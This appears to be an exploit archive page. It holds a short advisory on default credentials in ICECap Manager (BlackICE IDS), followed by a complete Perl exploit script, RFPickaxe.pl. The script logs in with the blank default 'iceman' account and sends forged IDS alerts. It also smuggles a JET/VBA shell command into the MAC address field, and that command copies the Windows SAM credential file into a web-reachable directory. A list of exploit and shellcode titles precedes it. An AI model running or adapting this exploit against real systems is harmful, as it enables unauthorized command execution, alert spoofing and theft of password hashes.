
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
112 lines
No EOL
3.6 KiB
Perl
Executable file
112 lines
No EOL
3.6 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/1216/info
|
|
|
|
|
|
ICECap Manager is a management console for BlackICE IDS Agents and Sentries. By default, ICECap Manager listens on port 8081, transmits alert messages to another server on port 8082, and has an administrative username of 'iceman' possessing a blank password. A remote user could login to ICECap manager through port 8081 (using the default username and password if it hasn't been modified) and send out false alerts.
|
|
|
|
In addition, the evaluation version of ICECap Manager has the option of utilizing Microsoft Access' JET Engine 3.5. This creates a security hazard because JET Engine 3.5 is vulnerable to remote execution of Visual Basic for Application code. Therefore, remote users may execute arbitrary commands on ICECap Manager through the use of the default username and password and JET Engine 3.5. More information can be found regarding the JET Database Engine 3.5 vulnerability at the following URL:
|
|
|
|
https://www.securityfocus.com/bid/286
|
|
|
|
Please note that ICECap Manager is no longer maintained by Network Ice but by Internet Security Systems.
|
|
|
|
#!/usr/bin/perl
|
|
#
|
|
# RFPickaxe.pl - demo exploit for default ICECap login/alerts
|
|
# Disclaimer: I do not provide technical support for my exploits!
|
|
#
|
|
# Sorry, this requires Unix, due to the `date` call
|
|
|
|
$|=1;
|
|
use Socket;
|
|
|
|
###############################################################
|
|
|
|
# IP of ICECap system (assumes port 8082)
|
|
|
|
$Target="10.10.200.4";
|
|
|
|
# account info - uses default 'iceman' w/ no password
|
|
|
|
$account="iceman";
|
|
$httpauth="aWNlbWFuOiUzQjclQzYlRkU=";
|
|
|
|
#-------- attributes of the alert ----------
|
|
|
|
$id="100005";
|
|
$issue_name="Exploit";
|
|
$sev="1";
|
|
|
|
# spoof these
|
|
|
|
$target="0.0.0.8";
|
|
$target_dns="some.host.com";
|
|
$det_ip="0.0.0.8";
|
|
$det_nbn="SENSOR";
|
|
$int_ip="255.255.255.255";
|
|
$param="Pickaxe";
|
|
|
|
# either fake the MAC, or use it to run commands via JET vulnerability
|
|
|
|
#$det_mac="0000000000000";
|
|
$det_mac="|shell(\"cmd /c copy c:\\winnt\\repair\\sam._ ".
|
|
"c:\\progra~1\\networ~1\\icecap\\spatch\\en\\sam.exe \")|";
|
|
|
|
##############################################################
|
|
|
|
|
|
$inet=inet_aton($Target);
|
|
|
|
$time=`date -u "+%Y-%m-%d %T"`;
|
|
$time=~s/ /%20/g;
|
|
$time=~s/:/%3a/g;
|
|
|
|
#path is \program files\network ice\icecap\spatch\en
|
|
|
|
$alert="accountName=$account&issueID=$id&issueName=$issue_name".
|
|
"&severity=$sev&targetNetAddress=$target&targetDNSName=".
|
|
"$target_dns&detectorNetAddress=$det_ip&detectorNetBIOS".
|
|
"Name=$det_nbn&detectorMacAddress=$det_mac&".
|
|
"intruderNetAddress=$int_ip&detectorType=3&startTime=".
|
|
"$time¶meter=$param\r\n";
|
|
|
|
$len=length($alert);
|
|
|
|
@DXX=();
|
|
$send=<<EOT
|
|
POST / HTTP/1.0
|
|
User-Agent: netice-alerter/1.0
|
|
Host: $Target:8082
|
|
Authorization: Basic $httpauth
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: $len
|
|
|
|
EOT
|
|
;
|
|
|
|
$send=~s/\n/\r\n/g;
|
|
$send=$send.$alert;
|
|
|
|
sendraw("$send");
|
|
|
|
print @DXX;
|
|
|
|
exit;
|
|
|
|
sub sendraw { # raw network functions stay in here
|
|
my ($pstr)=@_;
|
|
$PROTO=getprotobyname('tcp')||0;
|
|
|
|
# AF_INET=2 SOCK_STREAM=1
|
|
eval {
|
|
alarm(30);
|
|
if(!(socket(S,2,1,$PROTO))){ die("socket");}
|
|
if(connect(S,pack "SnA4x8",2,8082,$inet)){
|
|
# multi-column perl coding...don't do as I do ;)
|
|
select(S); $|=1;
|
|
print $pstr;
|
|
@DXX=<S>;
|
|
select(STDOUT); close(S);
|
|
alarm(0); return;
|
|
} else { die("not responding"); }
|
|
alarm(0);};
|
|
if ($@) { if ($@ =~ /timeout/){ die("Timed out!\n");}}} |